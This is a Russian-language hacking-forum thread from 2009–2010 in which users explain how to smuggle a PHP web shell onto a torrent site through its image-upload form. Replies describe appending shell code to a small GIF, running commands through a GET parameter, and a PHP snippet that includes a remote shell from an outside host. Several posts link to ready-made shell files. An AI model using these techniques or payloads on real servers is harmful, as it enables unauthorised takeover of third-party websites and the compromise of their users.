Нужно залить shell через картинку |
04.05.2009, 19:23
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами:
9725544
Репутация:
246
|
|
Нужно залить shell через картинку
Есть торрент в нем есть заливка картинок.
Могу залить картинку и сделать её не jpeg а php.
При заливке простой картинки все нормально и в пхп сохраняет. Вот ниже если поменять jpg на php то на сервер он зальёт как php.
Код:
-----------------------------220022761016327\r\nContent-Disposition: form-data; name="file";
\nContent-Disposition: form-data; name="file"; filename="1.jpg"\r\nContent-Type:
и там дальше исходник картинки.
А вот когда шелл сохраняем в формате jpg и пытаюсь залить он не заливает.
Вобщем кто знает как обойти фильтр.
Все делается через post запрос.
Или скинте картинку с шелом |
|
|
04.05.2009, 20:41
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Состряпай в пейнте картинку 1 на 1.
Открой её фаром и на новой строке впиши код шелла (какой нидь не большой типа выполнялки команд).
К примеру гифка: http://rapidshare.com/files/229115118/m.gif.html
?ev=phpinfo();
Последний раз редактировалось Grey; 05.05.2009 в 01:05..
|
|
|
|
04.05.2009, 23:01
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами:
9725544
Репутация:
246
|
|
да все супер залил но теперь при заходе на эту страницу вылетает такое.
 |
|
|
|
04.05.2009, 23:23
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от S0ulVortex
да все супер залил но теперь при заходе на эту страницу вылетает такое.
Всё правильно, так и будет вылезать, но код при этом будет выполняться, а все остальное будет отображаться как html.
Если юзал мою картинку, то выполняй код так:
gif.php?ev=phpinfo();
|
|
|
|
09.05.2009, 10:41
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9539749
Репутация:
21
|
|
ну вот у меня трабл тоже самое я могу ... но на фотку твою добавил р57 не сработало (
|
|
|
|
09.05.2009, 11:08
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9539749
Репутация:
21
|
|
Грей обясни.. плз
|
|
|
|
04.05.2009, 23:21
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
|
|
|
|
04.02.2010, 23:43
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 15
С нами:
8580976
Репутация:
0
|
|
Сообщение от m0Hze
Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
|
|
|
|
05.02.2010, 00:48
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Сообщение от oiki
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
Обращайся к shell.gif снужными get параметрами.И сейчас эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже.
|
|
|
|
09.05.2009, 11:20
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами:
10566621
Репутация:
1198
|
|
http://file-hran2006.narod.ru/shell.txt если нужен шелл, не ищи.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
